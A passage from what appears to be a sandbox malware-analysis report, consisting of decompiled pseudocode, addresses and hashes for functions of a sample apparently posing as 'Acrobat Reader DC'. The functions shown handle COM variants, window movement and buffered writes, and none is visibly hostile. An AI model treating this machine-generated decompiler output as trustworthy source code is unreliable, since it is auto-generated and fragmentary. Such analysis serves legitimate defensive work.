																_t220 = 0x00004000 |  *( *_t238 + 4);
																__eflags = _t220;
																 *_t312 = _t220;
																_t218 = _a16;
															}
															__eflags =  *_t312 - 0x1b;
															if( *_t312 == 0x1b) {
																_t222 = 0x00002000 |  *( *_t238 + 4);
																__eflags = _t222;
																 *_t312 = _t222;
																_t218 = _a16;
															}
															__eflags =  *_t312 - 0x1d;
															if( *_t312 == 0x1d) {
																 *_t312 = E0044A545(_a4, _t312, _a4,  *_t238);
																_t153 = _v8;
																_t315 = _t315 + 8;
															}
															_t312[0] =  *((intOrPtr*)( *((intOrPtr*)(_t153 + 8)) + _t307 + 0xc));
															_t241 =  &(_v16[0]);
															_t307 = _t307 + 0x10;
															_t312 =  &(_t312[1]);
															_v16 = _t241;
															__eflags = _t241 -  *(_t153 + 0x18);
														} while (_t241 <  *(_t153 + 0x18));
													}
													_t232 =  *(_t153 + 0x24) & 0x0000ffff;
													_t271 = _t232 - 0x16;
													__eflags = _t271 - 3;
													if(_t271 <= 3) {
														switch( *((intOrPtr*)(_t271 * 4 +  &M0045212B))) {
															case 0:
																_t232 = 3;
																goto L48;
															case 1:
																__ecx = 0x13;
																goto L48;
															case 2:
																__ecx = 0;
																goto L48;
															case 3:
																__ecx = 0xa;
																goto L48;
														}
													}
													L48:
													_t218[3] = _t232;
													_t218[1] =  *(_t153 + 0x10);
													_t218[3] =  *(_t153 + 0x18);
													_t235 = _a4;
													_t218[2] =  *(_t153 + 0x14);
													 *((intOrPtr*)( *((intOrPtr*)( *_t235 + 0x50))))(_t235, _t153);
													E00430EAD( &_a4);
													__eflags = 0;
													return 0;
												} else {
													_t243 = _a4;
													 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 0x50))))(_t243, _t153);
													E00430EAD( &_a4);
													return 0x80004005;
												}
											}
										} else {
											while(1) {
												_t180 = _a4;
												_t309 =  *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x14))))(_t180, _t313 & 0x0000ffff,  &_v8);
												_t183 = _a4;
												_t252 =  *_t183;
												__eflags = _t309;
												if(_t309 < 0) {
													break;
												}
												 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x30))))(_t183,  *_v8,  &_v16, 0, 0, 0);
												_t254 = _v8;
												__eflags =  *(_t254 + 0x10) & 0x00000003;
												if(( *(_t254 + 0x10) & 0x00000003) == 0) {
													L26:
													__imp__#6(_v16);
													_t190 = _a4;
													 *((intOrPtr*)( *((intOrPtr*)( *_t190 + 0x50))))(_t190, _v8);
													_t192 = _v12;
													_t313 = 1 + _t313;
													_v8 = 0;
													__eflags = _t313 -  *((intOrPtr*)(_t192 + 0x2c));
													if(_t313 <  *((intOrPtr*)(_t192 + 0x2c))) {
														continue;
													} else {
														goto L30;
													}
												} else {
													_t194 = lstrcmpiW(_v16, _a12);
													__eflags = _t194;
													if(_t194 == 0) {
														__imp__#6(_v16);
														goto L30;
													} else {
														goto L26;
													}
												}
												goto L51;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t252 + 0x4c))))(_t183, _v12);
											E00430EAD( &_a4);
											return _t309;
										}
									} else {
										__imp__#6(_v16);
										_v20 = _t306;
										goto L15;
									}
								}
							} else {
								__eflags =  *(_t227 + 0x36) & 0x00000040;
								if(( *(_t227 + 0x36) & 0x00000040) == 0) {
									goto L12;
								} else {
									_t195 = _a4;
									 *((intOrPtr*)( *((intOrPtr*)( *_t195 + 0x4c))))(_t195, _t227);
									_t198 = _a4;
									_t200 =  *((intOrPtr*)( *((intOrPtr*)( *_t198 + 0x20))))(_t198, 0xffffffff,  &_v24);
									__eflags = _t200;
									if(_t200 < 0) {
										L8:
										E00430EAD( &_a4);
										return 0x80004005;
									} else {
										_t201 = _a4;
										_v16 = 0;
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t201 + 0x38))))(_t201, _v24,  &_v16);
										if(__eflags >= 0) {
											E00441E8D(__eflags,  &_a4,  &_v16);
											_t205 = _a4;
											_t314 =  *((intOrPtr*)( *((intOrPtr*)( *_t205 + 0xc))))(_t205,  &_v12);
											__eflags = _t314;
											if(_t314 >= 0) {
												E00430EAD( &_v16);
												goto L12;
											} else {
												E00430EAD( &_v16);
												E00430EAD( &_a4);
												return _t314;
											}
										} else {
											E00430EAD( &_v16);
											goto L8;
										}
									}
								}
							}
						}
					} else {
						E00430EAD( &_a4);
						return 0x80004001;
					}
				} else {
					L1:
					E00430EAD( &_a4);
					return _t310;
				}
				L51:
			}




























































                                  0x00451d31
                                  0x00451d35
                                  0x00451d3a
                                  0x00451d48
                                  0x00451d4b
                                  0x00451d56
                                  0x00451d5e
                                  0x00451d62
                                  0x00452107
                                  0x0045210c
                                  0x0045210e
                                  0x00451d7a
                                  0x00451d80
                                  0x00451d90
                                  0x00451d92
                                  0x00451d94
                                  0x00000000
                                  0x00451d96
                                  0x00451d96
                                  0x00451d99
                                  0x00451d9d
                                  0x00451e50
                                  0x00451e50
                                  0x00451e5c
                                  0x00451e6a
                                  0x00451e6c
                                  0x00451e6e
                                  0x00451ea0
                                  0x00451ea0
                                  0x00451ea5
                                  0x00451ea7
                                  0x00451eab
                                  0x00000000
                                  0x00451eb1
                                  0x00451eb1
                                  0x00451eb1
                                  0x00451ec4
                                  0x00451ec6
                                  0x00451ec8
                                  0x00000000
                                  0x00000000
                                  0x00451eca
                                  0x00451ecd
                                  0x00451ed1
                                  0x00451ede
                                  0x00451ede
                                  0x00451ee8
                                  0x00451eea
                                  0x00451eed
                                  0x00451eee
                                  0x00451ef5
                                  0x00451ef9
                                  0x00000000
                                  0x00451efb
                                  0x00000000
                                  0x00451efb
                                  0x00451ed3
                                  0x00451ed5
                                  0x00451ed8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00451ed8
                                  0x00000000
                                  0x00451ed1
                                  0x00451f00
                                  0x00451f0d
                                  0x00451f13
                                  0x00451f20
                                  0x00451f20
                                  0x00451e70
                                  0x00451e70
                                  0x00451e7d
                                  0x00451e7f
                                  0x00451e89
                                  0x00451e8b
                                  0x00451e8d
                                  0x00451f21
                                  0x00451f26
                                  0x00451f2a
                                  0x00451fd1
                                  0x00451fd1
                                  0x00451fde
                                  0x00451fe0
                                  0x00451fe3
                                  0x00451fe5
                                  0x00451fe7
                                  0x00000000
                                  0x00451fed
                                  0x00451fed
                                  0x00451ff1
                                  0x00451ff5
                                  0x0045201a
                                  0x00452020
                                  0x00452023
                                  0x00452026
                                  0x00452028
                                  0x00452028
                                  0x0045202b
                                  0x0045202b
                                  0x0045202e
                                  0x00452033
                                  0x00452035
                                  0x00452038
                                  0x0045203b
                                  0x00452044
                                  0x00452044
                                  0x00452048
                                  0x0045204b
                                  0x0045204b
                                  0x0045204e
                                  0x00452052
                                  0x0045205b
                                  0x0045205b
                                  0x0045205f
                                  0x00452062
                                  0x00452062
                                  0x00452065
                                  0x00452069
                                  0x00452077
                                  0x0045207a
                                  0x0045207d
                                  0x0045207d
                                  0x0045208c
                                  0x00452093
                                  0x00452094
                                  0x00452097
                                  0x0045209a
                                  0x0045209d
                                  0x0045209d
                                  0x0045202b
                                  0x004520a1
                                  0x004520a5
                                  0x004520a8
                                  0x004520ab
                                  0x004520ad
                                  0x00000000
                                  0x004520b4
                                  0x00000000
                                  0x00000000
                                  0x004520bb
                                  0x00000000
                                  0x00000000
                                  0x004520c2
                                  0x00000000
                                  0x00000000
                                  0x004520c6
                                  0x00000000
                                  0x00000000
                                  0x004520ad
                                  0x004520cb
                                  0x004520ce
                                  0x004520d5
                                  0x004520dc
                                  0x004520e0
                                  0x004520e3
                                  0x004520ed
                                  0x004520f3
                                  0x004520fa
                                  0x00452100
                                  0x00451ff7
                                  0x00451ff7
                                  0x00452001
                                  0x00452007
                                  0x00452017
                                  0x00452017
                                  0x00451ff5
                                  0x00451f30
                                  0x00451f30
                                  0x00451f30
                                  0x00451f43
                                  0x00451f45
                                  0x00451f48
                                  0x00451f4a
                                  0x00451f4c
                                  0x00000000
                                  0x00000000
                                  0x00451f62
                                  0x00451f64
                                  0x00451f67
                                  0x00451f6b
                                  0x00451f7f
                                  0x00451f83
                                  0x00451f89
                                  0x00451f96
                                  0x00451f98
                                  0x00451f9b
                                  0x00451f9c
                                  0x00451fa3
                                  0x00451fa7
                                  0x00000000
                                  0x00451fa9
                                  0x00000000
                                  0x00451fa9
                                  0x00451f6d
                                  0x00451f75
                                  0x00451f7b
                                  0x00451f7d
                                  0x00451fcb
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00451f7d
                                  0x00000000
                                  0x00451f6b
                                  0x00451fb3
                                  0x00451fb9
                                  0x00451fc6
                                  0x00451fc6
                                  0x00451e93
                                  0x00451e97
                                  0x00451e9d
                                  0x00000000
                                  0x00451e9d
                                  0x00451e8d
                                  0x00451da3
                                  0x00451da3
                                  0x00451da7
                                  0x00000000
                                  0x00451dad
                                  0x00451dad
                                  0x00451db7
                                  0x00451db9
                                  0x00451dc8
                                  0x00451dca
                                  0x00451dcc
                                  0x00451df5
                                  0x00451df9
                                  0x00451e09
                                  0x00451dce
                                  0x00451dce
                                  0x00451dd8
                                  0x00451de8
                                  0x00451dea
                                  0x00451e12
                                  0x00451e17
                                  0x00451e26
                                  0x00451e28
                                  0x00451e2a
                                  0x00451e4b
                                  0x00000000
                                  0x00451e2c
                                  0x00451e30
                                  0x00451e39
                                  0x00451e46
                                  0x00451e46
                                  0x00451dec
                                  0x00451df0
                                  0x00000000
                                  0x00451df0
                                  0x00451dea
                                  0x00451dcc
                                  0x00451da7
                                  0x00451d9d
                                  0x00452114
                                  0x00452118
                                  0x00452128
                                  0x00452128
                                  0x00451d68
                                  0x00451d68
                                  0x00451d6c
                                  0x00451d79
                                  0x00451d79
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                  • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                  • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 54%
                                  			E00479500(short* __ecx, void* __fp0, char _a4, intOrPtr _a12) {
				char _v28;
				char _v52;
				short* __edi;
				char* __esi;
				signed int _t32;
				void* _t39;
				void* _t46;
				short* _t47;
				void* _t50;

				_t47 = __ecx;
				__imp__#8(__ecx, _t46, _t50, _t39);
				_t32 = _a12 - 1;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				if(_t32 > 0xb) {
					L17:
					E00408F40(_t47,  &_a4);
					return _t47;
				} else {
					switch( *((intOrPtr*)(_t32 * 4 +  &M004796E4))) {
						case 0:
							__eax = 3;
							__ecx =  &_a4;
							 *__edi = __ax;
							__eax = E0040C650( &_a4);
							goto L16;
						case 1:
							__eax =  &_a4;
							__edx = 0x14;
							 *__edi = __dx;
							__eax = E00443006( &_a4);
							 *((intOrPtr*)(__edi + 0xc)) = __edx;
							goto L16;
						case 2:
							__ecx = 5;
							 *__edi = __cx;
							__ecx =  &_a4;
							__eax = E0040BAA0( &_a4);
							 *((long long*)(__edi + 8)) = __fp0;
							__esi =  &_a4;
							E00408F40(__edi,  &_a4) = __edi;
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __edi;
							goto L18;
						case 3:
							__ecx =  &_a4;
							__eax = 8;
							 *__edi = __ax;
							__eax = E0045340C( &_a4);
							_push(__eax);
							__imp__#2();
							goto L16;
						case 4:
							__esp = __esp - 0x10;
							__edx = 0x200c;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __dx;
							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
							__eax = E00479362(__eflags, __fp0);
							goto L16;
						case 5:
							__eax =  &_a4;
							__eax = E00432508( &_a4);
							__esp = __esp - 0x10;
							__ebx = __esp;
							__eax = E0040B960(__eax, __esp, __ecx, __edi);
							__ecx =  &_v28;
							E00479500( &_v28, __fp0) = E00437063(__edi, __eax);
							__ecx =  &_v52;
							_push( &_v52);
							__imp__#9();
							__esi =  &_a4;
							E00408F40(__edi,  &_a4) = __edi;
							_pop(__edi);
							_pop(__esi);
							_pop(__ebx);
							return __edi;
							goto L18;
						case 6:
							__edx =  &_a4;
							__ecx = 0x13;
							 *__edi = __cx;
							__eax = E0044B3AC( &_a4);
							goto L16;
						case 7:
							__eax = _a4;
							__eflags = __eax;
							if(__eax == 0) {
								goto L17;
							} else {
								_push(__eax);
								_push(__edi);
								__imp__#10();
								__esi =  &_a4;
								E00408F40(__edi,  &_a4) = __edi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __edi;
							}
							goto L18;
						case 8:
							 *__ecx = 0xb;
							 *((short*)(_t47 + 8)) = E00442F4C( &_a4) & 0x000000ff;
							E00408F40(_t47,  &_a4);
							return _t47;
							goto L18;
						case 9:
							__edx =  &_a4;
							__eax = E0044CECD( &_a4);
							__eflags = __al;
							if(__al == 0) {
								goto L14;
							} else {
								__eax = 0xa;
								__esi =  &_a4;
								 *__edi = __ax;
								 *((intOrPtr*)(__edi + 8)) = 0x80020004;
								E00408F40(__edi,  &_a4) = __edi;
								_pop(__edi);
								_pop(__esi);
								_pop(__ebx);
								return __edi;
							}
							goto L18;
						case 0xa:
							L14:
							__esp = __esp - 0x10;
							__ecx = 0x2011;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __cx;
							__eax = E0040B960( &_a4, __esp, 0x2011, __edi);
							__eax = E00473B76(__eflags);
							goto L16;
						case 0xb:
							__esp = __esp - 0x10;
							__edx = 0x2013;
							__eax =  &_a4;
							__ebx = __esp;
							 *__edi = __dx;
							__eax = E0040B960( &_a4, __esp, __ecx, __edi);
							__eax = E0044CE43(__ecx, __eflags);
							L16:
							 *((intOrPtr*)(__edi + 8)) = __eax;
							goto L17;
					}
				}
				L18:
			}












                                  0x0047950c
                                  0x0047950f
                                  0x0047951a
                                  0x0047951b
                                  0x0047951e
                                  0x00479524
                                  0x004796d1
                                  0x004796d4
                                  0x004796e1
                                  0x0047952a
                                  0x0047952a
                                  0x00000000
                                  0x0047955c
                                  0x00479561
                                  0x00479564
                                  0x00479567
                                  0x00000000
                                  0x00000000
                                  0x00479597
                                  0x0047959a
                                  0x004795a0
                                  0x004795a3
                                  0x004795a8
                                  0x00000000
                                  0x00000000
                                  0x00479571
                                  0x00479576
                                  0x00479579
                                  0x0047957c
                                  0x00479581
                                  0x00479584
                                  0x0047958c
                                  0x0047958e
                                  0x0047958f
                                  0x00479590
                                  0x00479594
                                  0x00000000
                                  0x00000000
                                  0x004795c6
                                  0x004795c9
                                  0x004795cf
                                  0x004795d2
                                  0x004795d7
                                  0x004795d8
                                  0x00000000
                                  0x00000000
                                  0x004795e3
                                  0x004795e6
                                  0x004795eb
                                  0x004795ee
                                  0x004795f0
                                  0x004795f3
                                  0x004795f8
                                  0x00000000
                                  0x00000000
                                  0x00479628
                                  0x0047962c
                                  0x00479631
                                  0x00479634
                                  0x00479636
                                  0x0047963b
                                  0x00479646
                                  0x0047964b
                                  0x0047964f
                                  0x00479650
                                  0x00479656
                                  0x0047965e
                                  0x00479660
                                  0x00479661
                                  0x00479662
                                  0x00479666
                                  0x00000000
                                  0x00000000
                                  0x004795b0
                                  0x004795b3
                                  0x004795b9
                                  0x004795bc
                                  0x00000000
                                  0x00000000
                                  0x00479602
                                  0x00479605
                                  0x00479607
                                  0x00000000
                                  0x0047960d
                                  0x0047960d
                                  0x0047960e
                                  0x0047960f
                                  0x00479615
                                  0x0047961d
                                  0x0047961f
                                  0x00479620
                                  0x00479621
                                  0x00479625
                                  0x00479625
                                  0x00000000
                                  0x00000000
                                  0x0047953a
                                  0x00479548
                                  0x0047954c
                                  0x00479559
                                  0x00000000
                                  0x00000000
                                  0x00479669
                                  0x0047966d
                                  0x00479672
                                  0x00479674
                                  0x00000000
                                  0x00479676
                                  0x00479676
                                  0x0047967b
                                  0x0047967e
                                  0x00479681
                                  0x0047968d
                                  0x0047968f
                                  0x00479690
                                  0x00479691
                                  0x00479695
                                  0x00479695
                                  0x00000000
                                  0x00000000
                                  0x00479698
                                  0x00479698
                                  0x0047969b
                                  0x004796a0
                                  0x004796a3
                                  0x004796a5
                                  0x004796a8
                                  0x004796ad
                                  0x00000000
                                  0x00000000
                                  0x004796b4
                                  0x004796b7
                                  0x004796bc
                                  0x004796bf
                                  0x004796c1
                                  0x004796c4
                                  0x004796c9
                                  0x004796ce
                                  0x004796ce
                                  0x00000000
                                  0x00000000
                                  0x0047952a
                                  0x00000000

                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 0047950F
                                  • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                  • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                  • VariantClear.OLEAUT32(?), ref: 00479650
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$AllocClearCopyInitString
                                  • String ID:
                                  • API String ID: 2808897238-0
                                  • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                  • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                  • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004499DB(void* __eflags, signed int _a4, signed int _a8, int _a12, int _a16, int _a20) {
				struct tagPOINT _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				long _v28;
				signed int _t57;
				signed int _t58;
				struct HWND__* _t59;
				int _t61;
				int _t64;
				intOrPtr _t69;
				struct HWND__*** _t70;
				struct HWND__** _t71;
				struct HWND__** _t75;
				int _t78;
				int _t79;
				intOrPtr _t83;
				intOrPtr _t84;
				struct tagRECT* _t85;
				signed int _t86;
				int _t87;
				signed int _t88;
				struct HWND__** _t91;
				long _t95;
				struct HWND__** _t104;
				struct HWND__** _t107;

				_t78 = _a8;
				if(E00441AF5(0x4a8630, _a4,  &_a8,  &_a4) != 0) {
					_t83 =  *0x4a8690; // 0x0
					_t57 = _a4;
					_t84 =  *0x4a86a4; // 0xa71980
					_t107 =  *( *(_t83 + _a8 * 4));
					_t58 = _t57 | 0xffffffff;
					_t104 =  *( *(_t84 + _t57 * 4));
					__eflags = _t78 - _t58;
					if(_t78 != _t58) {
						L6:
						_t59 =  *_t104;
						_t85 =  &_v28;
						_a8 = _t59;
						GetWindowRect(_t59, _t85);
						_t95 = _v28;
						_t86 = _t85 | 0xffffffff;
						__eflags = _a16 - _t86;
						if(_a16 == _t86) {
							_t75 = _v20 - _t95;
							__eflags = _t75;
							_a16 = _t75;
						}
						_t61 = _v24;
						__eflags = _a20 - _t86;
						if(_a20 == _t86) {
							_t91 = _v16 - _t61;
							__eflags = _t91;
							_a20 = _t91;
						}
						_v12.x = _t95;
						_v12.y = _t61;
						ScreenToClient( *_t107,  &_v12);
						__eflags = _t78 - 0xffffffff;
						if(_t78 == 0xffffffff) {
							_t78 = _v12.x;
						}
						_t64 = _a12;
						__eflags = _t64 - 0xffffffff;
						if(_t64 == 0xffffffff) {
							_t64 = _v12.y;
						}
						_t87 = _a16;
						_t107[0x16] = _t78;
						_t107[0x17] = _t64;
						_t107[0x18] = _t87;
						_t107[0x19] = _a20;
						__eflags = _t104[0x20] - _t78;
						if(_t104[0x20] != _t78) {
							L19:
							_t79 = _a8;
							MoveWindow(_t79, _t78, _t64, _t87, _a20, 1);
							E0043028B(_t107, _t104, 1);
							_t88 = 3;
							__eflags = _t104[0x22] - 3;
							if(_t104[0x22] == 3) {
								_a20 = 3;
								__eflags =  *0x4a86b4 - _t88; // 0x2
								if(__eflags >= 0) {
									do {
										_t69 =  *0x4a86a4; // 0xa71980
										_t70 =  *(_t69 + _t88 * 4);
										__eflags =  *_t70;
										if( *_t70 != 0) {
											_t71 =  *_t70;
											__eflags = _t71[1] - _t107[1];
											if(_t71[1] == _t107[1]) {
												__eflags = _t71[0x22] - 0x16;
												if(_t71[0x22] == 0x16) {
													__eflags = _t71[0xc] - _t79;
													if(_t71[0xc] == _t79) {
														SendMessageW( *_t71, 0x469, _t79, 0);
														_t88 = _a20;
													}
												}
											}
										}
										_t88 = _t88 + 1;
										_a20 = _t88;
										__eflags = _t88 -  *0x4a86b4; // 0x2
									} while (__eflags <= 0);
								}
							}
							E00430B87(_t107, _t104, 1);
						} else {
							__eflags = _t104[0x20] - _t64;
							if(_t104[0x20] != _t64) {
								goto L19;
							} else {
								__eflags = _t104[0x21] - _t87;
								if(_t104[0x21] != _t87) {
									goto L19;
								} else {
									__eflags = _t104[0x21] - _a20;
									if(_t104[0x21] != _a20) {
										_t87 = _a16;
										goto L19;
									}
								}
							}
						}
					} else {
						__eflags = _a12 - _t58;
						if(_a12 != _t58) {
							goto L6;
						} else {
							__eflags = _a16 - _t58;
							if(_a16 != _t58) {
								goto L6;
							} else {
								__eflags = _a20 - _t58;
								if(_a20 != _t58) {
									goto L6;
								}
							}
						}
					}
					return 1;
				} else {
					return 0;
				}
			}





























                                  0x004499e5
                                  0x004499fd
                                  0x00449a0b
                                  0x00449a14
                                  0x00449a17
                                  0x00449a1e
                                  0x00449a23
                                  0x00449a27
                                  0x00449a29
                                  0x00449a2b
                                  0x00449a40
                                  0x00449a40
                                  0x00449a42
                                  0x00449a47
                                  0x00449a4a
                                  0x00449a50
                                  0x00449a53
                                  0x00449a56
                                  0x00449a59
                                  0x00449a5e
                                  0x00449a5e
                                  0x00449a60
                                  0x00449a60
                                  0x00449a63
                                  0x00449a66
                                  0x00449a69
                                  0x00449a6e
                                  0x00449a6e
                                  0x00449a70
                                  0x00449a70
                                  0x00449a73
                                  0x00449a79
                                  0x00449a80
                                  0x00449a86
                                  0x00449a89
                                  0x00449a8b
                                  0x00449a8b
                                  0x00449a8e
                                  0x00449a91
                                  0x00449a94
                                  0x00449a96
                                  0x00449a96
                                  0x00449a9c
                                  0x00449a9f
                                  0x00449aa2
                                  0x00449aa5
                                  0x00449aa8
                                  0x00449ab2
                                  0x00449ab4
                                  0x00449adf
                                  0x00449ae8
                                  0x00449aec
                                  0x00449af6
                                  0x00449afb
                                  0x00449b00
                                  0x00449b06
                                  0x00449b08
                                  0x00449b0b
                                  0x00449b11
                                  0x00449b1b
                                  0x00449b1b
                                  0x00449b20
                                  0x00449b23
                                  0x00449b26
                                  0x00449b28
                                  0x00449b2d
                                  0x00449b30
                                  0x00449b32
                                  0x00449b39
                                  0x00449b3b
                                  0x00449b3e
                                  0x00449b4b
                                  0x00449b51
                                  0x00449b51
                                  0x00449b3e
                                  0x00449b39
                                  0x00449b30
                                  0x00449b54
                                  0x00449b55
                                  0x00449b58
                                  0x00449b58
                                  0x00449b1b
                                  0x00449b11
                                  0x00449b64
                                  0x00449ab6
                                  0x00449abd
                                  0x00449abf
                                  0x00000000
                                  0x00449ac1
                                  0x00449ac8
                                  0x00449aca
                                  0x00000000
                                  0x00449acc
                                  0x00449ad3
                                  0x00449ad6
                                  0x00449adc
                                  0x00000000
                                  0x00449adc
                                  0x00449ad6
                                  0x00449aca
                                  0x00449abf
                                  0x00449a2d
                                  0x00449a2d
                                  0x00449a30
                                  0x00000000
                                  0x00449a32
                                  0x00449a32
                                  0x00449a35
                                  0x00000000
                                  0x00449a37
                                  0x00449a37
                                  0x00449a3a
                                  0x00000000
                                  0x00000000
                                  0x00449a3a
                                  0x00449a35
                                  0x00449a30
                                  0x00449b74
                                  0x004499ff
                                  0x00449a05
                                  0x00449a05

                                  APIs
                                  • GetWindowRect.USER32 ref: 00449A4A
                                  • ScreenToClient.USER32 ref: 00449A80
                                  • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Window$ClientMoveRectScreen
                                  • String ID:
                                  • API String ID: 3880355969-0
                                  • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                  • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                  • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E0041415F(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t56;
				signed int _t60;
				void* _t65;
				signed int _t66;
				signed int _t69;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t79;
				signed int _t81;
				signed int _t85;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				intOrPtr* _t96;
				void* _t97;

				_t92 = _a8;
				if(_t92 == 0 || _a12 == 0) {
					L4:
					return 0;
				} else {
					_t96 = _a16;
					_t100 = _t96;
					if(_t96 != 0) {
						_t79 = _a4;
						__eflags = _t79;
						if(__eflags == 0) {
							goto L3;
						}
						_t60 = _t56 | 0xffffffff;
						_t88 = _t60 % _t92;
						__eflags = _a12 - _t60 / _t92;
						if(__eflags > 0) {
							goto L3;
						}
						_t93 = _t92 * _a12;
						__eflags =  *(_t96 + 0xc) & 0x0000010c;
						_v8 = _t79;
						_v16 = _t93;
						_t78 = _t93;
						if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
							_v12 = 0x1000;
						} else {
							_v12 =  *(_t96 + 0x18);
						}
						__eflags = _t93;
						if(_t93 == 0) {
							L32:
							return _a12;
						} else {
							do {
								_t81 =  *(_t96 + 0xc) & 0x00000108;
								__eflags = _t81;
								if(_t81 == 0) {
									L18:
									__eflags = _t78 - _v12;
